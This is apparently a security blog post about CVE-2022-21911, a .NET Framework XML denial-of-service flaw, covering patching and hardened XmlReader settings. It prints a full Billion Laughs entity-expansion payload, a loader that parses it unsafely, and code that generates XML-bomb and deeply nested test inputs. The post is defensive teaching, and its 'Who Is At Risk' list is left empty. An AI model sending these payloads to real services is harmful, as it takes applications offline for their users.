In January 2022, Microsoft disclosed a vulnerability in the .NET Framework tracked as CVE-2022-21911. It lets an unauthenticated attacker on the network hang a .NET application, taking it offline for every other user. With so many web apps and APIs built on .NET, that matters. This post walks through what went wrong, how an attacker could trigger it, and, most importantly, how to protect your software.
What Is CVE-2022-21911?
CVE-2022-21911 is the official identifier for a *Denial of Service* (DoS) vulnerability in the .NET Framework. A bad actor does not need to steal data or break into your servers; they only have to *break your service* by making it crash or hang indefinitely.
Vendor: Microsoft
Product: Microsoft .NET Framework 4.8, 4.7.2
Impact: Denial of Service
Attack vector: Remote (over the network)
Fix available: Yes (released January 11, 2022, in the January 2022 .NET Framework security updates)
Microsoft advisory: MSRC CVE-2022-21911
A Simple Mistake With Heavy Consequences
What Caused the Vulnerability?
The root problem lies in how the .NET Framework's XML stack (System.Xml) handled certain malformed or deeply nested documents. Crafted input could drive the parser into unbounded recursion or make it consume huge amounts of CPU and memory, until the process hung or crashed.
Here is a basic, non-malicious example of XML parsing in C#:
using System;
using System.Xml;

class Program
{
    static void Main()
    {
        string xml = @"<root><child>I am safe</child></root>";
        XmlDocument doc = new XmlDocument();
        doc.LoadXml(xml);
        Console.WriteLine(doc.OuterXml);
    }
}
This works fine with well-behaved XML. Malicious XML, however, can be constructed to cause serious trouble.
The Exploit: Tiny Request, Total Freeze
How Could an Attacker Use This?
Attackers would send carefully prepared XML documents designed to overwhelm the parser. Two classic constructions:
- Billion Laughs Attack: an XML bomb whose nested entity declarations expand so many times that the parser runs out of memory.
- Deeply Nested Tags: a document with thousands of levels of <tag><tag><tag>...</tag></tag></tag>, which can overflow the stack of a recursive parser or make tree construction crawl.
Example: Malicious Input (Billion Laughs)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
This document is a few hundred bytes on the wire, but &lol9; expands to 8^9 (about 134 million) copies of "lol": roughly 400 MB of text, and twice that as a .NET UTF-16 string. Sent to an unpatched .NET application that loads untrusted XML with DTD processing enabled, it makes the process memory balloon until the application hangs or dies with an out-of-memory error. Note that the expansion only happens if the parser is allowed to process the DTD; that is the lever the fix below pulls.
Sample DoS C# Code
using System.IO;
using System.Xml;

class Program
{
    static void Main()
    {
        // Open your app to this incoming "bomb":
        string xml = File.ReadAllText("billion_laughs.xml");
        var doc = new XmlDocument();
        doc.LoadXml(xml); // entity expansion happens here: memory balloons, the process hangs or dies
    }
}
Who Is At Risk?
If you're using the .NET Framework (not .NET Core/5/6+), especially versions 4.7.2 and 4.8, and your application:
How Bad Was This (CVSS score)?
CVSS Score: 7.5 (High), vector AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
- *Why?* The attack is cheap to perform, works over the network with no authentication or user interaction, and takes the whole application down; only availability is affected, which is why it stops short of Critical.
How Do I Fix It?
1. Update the .NET Framework
Microsoft released the fix on January 11, 2022, as part of the January 2022 Patch Tuesday updates. .NET Framework rollups are cumulative, so any later Security and Quality Rollup also contains it.
Get the patch here:
- 2022-01 Security and Quality Rollup for .NET Framework
2. Harden XML Parsing
Patching removes the framework bug, but an application that parses untrusted XML with permissive settings is exposed to entity expansion regardless of the patch level. Parse through an XmlReader with hardened settings instead of calling XmlDocument.LoadXml directly on raw input.
Safer XML Parsing Example
using System;
using System.Xml;

class Program
{
    static void Main()
    {
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Prohibit, // rejects any <!DOCTYPE>, so no entities (internal or external) can be declared or expanded
            MaxCharactersFromEntities = 1024        // only matters if DtdProcessing is ever relaxed to Parse
        };
        using (var reader = XmlReader.Create("input.xml", settings))
        {
            var doc = new XmlDocument();
            doc.Load(reader);
            Console.WriteLine(doc.OuterXml);
        }
    }
}
DtdProcessing.Prohibit closes the entity-expansion door, but neither setting bounds element nesting: a document of thousands of nested tags still parses and still gets turned into a tree. Cap the size of untrusted input before parsing, and when you stream it, check XmlReader.Depth and abort early.
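To show both payload classes from the "How Could an Attacker Use This?" section against one hardened loader, here is an added example (not code from the original post or from Microsoft) that builds a Billion Laughs document and a deeply nested document in memory, then loads each through a reader that prohibits DTDs, caps input size and checks XmlReader.Depth before any DOM is built. The limits MaxDepth and MaxInputBytes, the names SafeXml, LoadUntrusted and CheckDepth, and the two payload generators are assumptions made for this demonstration.

```csharp
// Added example, not code from the original post or from Microsoft.
// Assumes .NET Framework 4.x (System.Xml). MaxDepth and MaxInputBytes are
// illustrative limits chosen here; tune them to what your application needs.
using System;
using System.IO;
using System.Text;
using System.Xml;

static class SafeXml
{
    const int MaxDepth = 64;            // deepest element nesting the app accepts
    const int MaxInputBytes = 1 << 20;  // 1 MiB cap on untrusted input

    static XmlReaderSettings HardenedSettings()
    {
        return new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Prohibit,   // any <!DOCTYPE> is an XmlException: no entities, no Billion Laughs
            XmlResolver = null,                       // never fetch external resources
            MaxCharactersFromEntities = 1024,         // only relevant if DtdProcessing is ever relaxed
            MaxCharactersInDocument = MaxInputBytes,  // parser-level size cap, in characters
        };
    }

    // Streams the document once without building a tree and throws if any node
    // sits deeper than MaxDepth. The reader keeps only its element stack, so memory
    // stays proportional to the input, and it runs before XmlDocument allocates anything.
    static void CheckDepth(string xml)
    {
        using (var reader = XmlReader.Create(new StringReader(xml), HardenedSettings()))
        {
            while (reader.Read())
            {
                if (reader.Depth > MaxDepth)
                {
                    var info = reader as IXmlLineInfo;
                    throw new XmlException(
                        "element nesting exceeds " + MaxDepth +
                        (info != null ? " at line " + info.LineNumber : ""));
                }
            }
        }
    }

    // Loads untrusted XML into an XmlDocument or throws XmlException.
    public static XmlDocument LoadUntrusted(string xml)
    {
        if (Encoding.UTF8.GetByteCount(xml) > MaxInputBytes)
            throw new XmlException("input larger than " + MaxInputBytes + " bytes");

        CheckDepth(xml);   // rejects the nested-tag payload (and, via Prohibit, any DTD)

        var doc = new XmlDocument { XmlResolver = null };
        using (var reader = XmlReader.Create(new StringReader(xml), HardenedSettings()))
        {
            doc.Load(reader);
        }
        return doc;
    }
}

class Program
{
    // Constructed payload: the Billion Laughs document from above, parameterised.
    static string BillionLaughs(int levels, int fanOut)
    {
        var sb = new StringBuilder("<?xml version=\"1.0\"?>\n<!DOCTYPE lolz [\n<!ENTITY lol \"lol\">\n");
        for (int i = 1; i <= levels; i++)
        {
            string previous = i == 1 ? "&lol;" : "&lol" + (i - 1) + ";";
            sb.Append("<!ENTITY lol").Append(i).Append(" \"");
            for (int j = 0; j < fanOut; j++) sb.Append(previous);
            sb.Append("\">\n");
        }
        return sb.Append("]>\n<lolz>&lol").Append(levels).Append(";</lolz>").ToString();
    }

    // Constructed payload: <a><a><a>...x...</a></a></a> nested `depth` times.
    static string DeeplyNested(int depth)
    {
        var sb = new StringBuilder("<?xml version=\"1.0\"?>");
        for (int i = 0; i < depth; i++) sb.Append("<a>");
        sb.Append("x");
        for (int i = 0; i < depth; i++) sb.Append("</a>");
        return sb.ToString();
    }

    static void Main()
    {
        var samples = new[]
        {
            "<root><child>I am safe</child></root>",
            BillionLaughs(9, 8),    // ~134 million "lol"s if expanded; a few hundred bytes on the wire
            DeeplyNested(100000),   // ~700 KB, 100,000 levels deep
        };

        foreach (var xml in samples)
        {
            try
            {
                var doc = SafeXml.LoadUntrusted(xml);
                Console.WriteLine("accepted: <" + doc.DocumentElement.Name + ">");
            }
            catch (XmlException e)
            {
                Console.WriteLine("rejected: " + e.Message);
            }
        }
    }
}
```

Running this accepts the first sample and rejects the other two with an XmlException before any significant memory is consumed: the Billion Laughs document fails at the <!DOCTYPE> line, and the nested document fails at the 66th <a>. The depth check costs a second streaming parse of at most MaxInputBytes, which is far cheaper than letting XmlDocument build a tree of 100,000 elements first.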
Final Thoughts
CVE-2022-21911 proves that just parsing a file or a chunk of text can pose a huge risk to any web service, API, or even a background task. Denial of Service bugs like this don't require fancy hacks—just the right (or wrong) input. Always keep your frameworks updated, and never trust input from users, even if it seems as innocent as a file upload.
Further Reading
- Microsoft Security Advisory CVE-2022-21911
- OWASP XML External Entity (XXE) Prevention Cheat Sheet
Timeline
Published on: 01/11/2022 21:15:00 UTC
Last modified on: 05/23/2022 17:29:00 UTC